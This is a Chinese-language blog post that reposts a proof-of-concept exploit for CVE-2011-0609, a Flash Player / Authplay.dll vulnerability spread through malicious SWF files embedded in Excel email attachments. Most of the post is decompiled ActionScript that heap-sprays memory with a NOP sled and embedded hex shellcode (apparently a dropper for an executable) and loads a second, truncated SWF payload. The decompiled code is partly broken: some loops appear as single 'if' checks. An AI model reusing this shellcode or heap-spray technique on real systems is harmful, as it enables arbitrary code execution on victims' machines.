2013年4月27日 星期六

CVE-2011-0609 poc

http://www.pulog.org/poc/1958/CVE-2011-0609/

Adobe Flash Player是一款Flash文件处理程序。Windows, Macintosh, Linux和Solaris操作系统下的Adobe Flash Player 10.2.152.33和之前版本(dobe Flash Player 10.2.154.18和用于Chrome用户的早期版本),Android下的Adobe Flash Player 10.1.106.16及早期版本,Windows和Macintosh操作系统下的Adobe Reader及Acrobat X (10.0.1)和Reader及Acrobat早期10.x和9.x版本提供的Authplay.dll组件存在严重安全漏洞。可能导致执行任意代码。漏洞在网络上已积极利用,把恶意FLASH(.swf)文件嵌入到Microsoft Excel (.xls),并通过Email附件进行攻击。Adobe Reader和Acrobat. Adobe Reader X不受此漏洞影响。

[+]info:
~~~~~~~~~
CVE-2011-0609 - Adobe Flash Player ZeroDay
Filename: crsenvironscan.xls
Size:126,444 bytes
MD5 Hash: 4BB64C1DA2F73DA11F331A96D55D63E2

[+]poc:
~~~~~~~~~
漏洞利用的actionscript
001package
002{
003    import flash.display.*;
004    import flash.system.*;
005    import flash.utils.*;
006 
007    public class hs extends MovieClip
008    {
009        static const POOL_SIZE:int = 1048576;
010        static var allocs:Array;
011        static var pool:ByteArray;
012        static var dstSize:int;
013        static var allocCount:int;
014        static var cevent:Function;
015        static var childRef:DisplayObject = null;
016        static var container:Sprite = null;
017 
018        public function hs()
019        {
020            var _loc_1:* = new ByteArray();
021            _loc_1.endian = Endian.LITTLE_ENDIAN;
022            var _loc_3:int = 0;
023            _loc_3 = 0;
024             
025            if (_loc_3 < 5140 - 32)
026            {
027                _loc_1.writeInt(336860180);
028                _loc_3 = _loc_3 + 4;
029                ;
030            }
031            _loc_1.writeInt(2425393296);
032            _loc_1.writeInt(2425393296);
033            var _loc_4:String = "141414141414141414141414141414141414141414141414141464A1300000008B400C8B701CAD8B7008E93D0200005881EC000200008BFC89770889471090FF770868EC97030CE8CC01000089471CFF770868F622B97CE8BC010000894720FF770868A517007CE8AC010000894724FF770868FB97FD0FE89C010000894728FF7708681665FA10E88C01000089472CFF7708681F790AE8E87C010000894730FF77086825B0FFC2E86C010000894734FF770868AC08DA76E85C010000894738FF77086898FE8A0EE84C01000089473CFF77086883B9B578E83C010000894740FF770868E6178F7BE82C010000894744FF770868AD9B7DDFE81C010000894748FF7710FF573433F6468D47605056FF574883F8FF74F23D0000010076EB894704897760FF77046A40FF571C89475C6A006A006A00FF7760FF573883F8FF744B6A008D5F7053FF7704FF775CFF7760FF572C8B4F7083E9108B475C408138432E42477509817804040689197404E2ECEB1A83C0088947144081384655634B750981780424048219740EE2ECFF775CFF57200F8572FFFFFF83C0088947186A0068800000006A026A006A006800000040FF7710FF5724894764C7476C4D5A90006A008D5F70536A048D5F6C53FF7764FF57308B47182B471483E8088B5F1430034348434883F80075F56A008D5F70538B5F182B5F1483EB0853FF7714FF7764FF5730FF7764FF57286A00FF7710FF573C6A00FF57446A0050FF5740558BEC578B7D088B5D0C568B733C8B74337803F3568B762003F333C94941AD03C35633F60FBE1038D67408C1CE0D03F240EBF13BFE5E75E55A8BEB8B5A2403DD668B0C4B8B5A1C03DD8B048B03C55E5F5DC20800E8BEFDFFFF612E6578650000";
034            _loc_1.writeBytes(hexToBin(_loc_4));
035            _loc_3 = _loc_1.length;
036             
037            if (_loc_3 < 65536)
038            {
039                _loc_1.writeInt(336860180);
040                _loc_3 = _loc_3 + 4;
041                ;
042            }
043            alloc(_loc_1, 1048576 - 1536 - 36);
044            var _loc_5:* = new ByteArray();
045            _loc_5.writeBytes(pool, 0, 1048576 - 3840 - 36);
046            allocs.push(_loc_5);
047            pool = null;
048            var _loc_6:* = 0;
049             
050            if (_loc_6 < 1280)
051            {
052                var _loc_7:* = new ByteArray();
053                _loc_7.writeBytes(_loc_5, 0, 1048576 - 3840 - 36);
054                allocs.push(_loc_7);
055                _loc_6 = _loc_6 + 1;
056                ;
057            }
058            var _loc_8:String = "43575309eac70000789cbcbc09601bc5153fbc33bbdad54a3e245f712e4721c64e8c1b27015a4809e01cce0189432e02c5b6.............[skipped].....................";
059            var _loc_9:* = new Loader();
060            var _loc_10:* = new LoaderContext(false);
061            _loc_9.loadBytes(hexToBin(_loc_8), _loc_10);
062            childRef = this.addChild(_loc_9);
063            return;
064        }// end function
065 
066        public static function init_pool(param1)
067        {
068            hs.pool = new ByteArray();
069            hs.pool.writeBytes(param1);
070            while (hs.pool.length < 1048576)
071            {
072                 
073                var _loc_3:* = new ByteArray();
074                _loc_3.writeBytes(hs.pool);
075                hs.pool.writeBytes(_loc_3);
076            }
077            return;
078        }// end function
079 
080        public static function alloc(param1, param2)
081        {
082            if (hs.allocs == null)
083            {
084                hs.allocs = new Array();
085            }
086            hs.dstSize = param2;
087            hs.init_pool(param1);
088            return;
089        }// end function
090 
091        public static function free()
092        {
093            hs.allocs = null;
094            return;
095        }// end function
096 
097        public static function hexToBin(param1:String) : ByteArray
098        {
099            var _loc_2:* = new ByteArray();
100            var _loc_3:* = param1.length;
101            var _loc_4:uint = 0;
102             
103            if (_loc_4 < _loc_3)
104            {
105                var _loc_5:* = param1.charAt(_loc_4) + param1.charAt((_loc_4 + 1));
106                _loc_2.writeByte(parseInt(_loc_5, 16));
107                _loc_4 = _loc_4 + 2;
108                ;
109            }
110            return _loc_2;
111            return;
112        }// end function
113 
114    }
115}
漏洞更多信息参见:http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html

沒有留言:

張貼留言